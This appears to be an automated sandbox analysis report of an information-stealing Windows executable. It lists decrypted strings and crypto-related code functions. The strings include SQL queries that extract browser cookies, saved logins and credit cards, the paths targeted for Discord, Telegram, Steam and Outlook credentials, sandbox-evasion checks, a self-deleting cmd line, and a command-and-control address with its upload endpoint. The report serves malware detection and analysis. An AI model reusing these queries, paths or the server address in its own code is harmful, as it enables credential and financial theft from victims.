Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT HOST_KEY, is_httponly, path, is_secure, (expires_utc/1000000)-11644480800, name, encrypted_value from cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TRUE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FALSE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT name, value FROM autofill
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: history
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT url FROM urls LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted FROM credit_cards
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: name:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: month:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: year:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: card:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Login Data
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Web Data
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: History
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: logins.json
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: formSubmitURL
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: usernameField
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encryptedUsername
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: encryptedPassword
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: guid
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT fieldname, value FROM moz_formhistory
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SELECT url FROM moz_places LIMIT 1000
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: cookies.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: formhistory.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: places.sqlite
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: plugins
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Local Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sync Extension Settings
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IndexedDB
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Opera GX Stable
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: chrome-extension_
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: _0.indexeddb.leveldb
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Local State
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: profiles.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: chrome
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: opera
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: firefox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wallets
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %08lX%04lX%lu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ProductName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: x32
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: x64
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %d/%d/%d %d:%d:%d
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ProcessorNameString
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DisplayName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DisplayVersion
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Network Info:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - IP: IP?
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Country: ISO?
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: System Summary:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - HWID:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - OS:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Architecture:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - UserName:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Computer Name:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Local Time:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - UTC:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Language:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Keyboards:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Laptop:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Running Path:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - CPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Threads:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Cores:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - RAM:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - Display Resolution:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: - GPU:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: User Agents:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Installed Apps:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: All Users:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Current User:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process List:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: system_info.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: freebl3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: mozglue.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: msvcp140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: nss3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: softokn3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: vcruntime140.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Temp\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: .exe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: runas
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: open
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /c start
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %DESKTOP%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %APPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %LOCALAPPDATA%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %USERPROFILE%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %DOCUMENTS%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %PROGRAMFILES%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %PROGRAMFILES_86%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %RECENT%
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.lnk
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: files
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \discord\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Local Storage\leveldb\CURRENT
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Local Storage\leveldb
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Telegram Desktop\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: key_datas
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: D877F783D5D3EF8C*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: map*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: A7FDF864FBC10B77*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: A92DAA6EA6F891F2*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: F8806DD0C461824F*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Telegram
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Tox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.tox
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: *.ini
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Password
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: oftware\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000001
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000002
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000003
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: 00000004
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Outlook\accounts.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Pidgin
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \.purple\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: accounts.xml
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: dQw4w9WgXcQ
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: token:
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Software\Valve\Steam
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SteamPath
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \config\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ssfn*
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: config.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DialogConfig.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DialogConfigOverlay*.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: libraryfolders.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: loginusers.vdf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Steam\
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sqlite3.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: browsers
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: done
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: soft
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: \Discord\tokens.txt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /c timeout /t 5 & del /f /q "
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: " & del "C:\ProgramData\*.dll"" & exit
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: C:\Windows\system32\cmd.exe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: https
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: POST
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HTTP/1.1
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Content-Disposition: form-data; name="
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: hwid
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: build
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: token
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: file_name
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: file
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: message
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: screenshot.jpg
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Sleep
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ntdll.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sscanf
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: http://85.28.47.31
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: silence
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /5499d72b3a3e55be.php
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: /8405906461a5200c/
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: sila
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalLock
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: Process32First
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindClose
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: psapi.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetDC
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptBinaryToStringA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: CryptUnprotectData
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: SHGetFolderPathA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: ShellExecuteExA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetConnectA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCloseHandle
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetOpenA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpSendRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: HttpOpenRequestA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetReadFile
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: InternetCrackUrlA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrStrA
Source: 0.2.file.exe.2600e67.1.raw.unpack	String decryptor: StrCmpCW

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409BB0 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,	0_2_00409BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00418940 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,	0_2_00418940
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0040C660 memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	0_2_0040C660
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00407280 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	0_2_00407280
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_00409B10 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	0_2_00409B10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6E6C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,	0_2_6C6E6C80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C83A9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	0_2_6C83A9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8344C0 PK11_PubEncrypt,	0_2_6C8344C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C804420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	0_2_6C804420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C834440 PK11_PrivDecrypt,	0_2_6C834440
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C8825B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	0_2_6C8825B0

Compliance

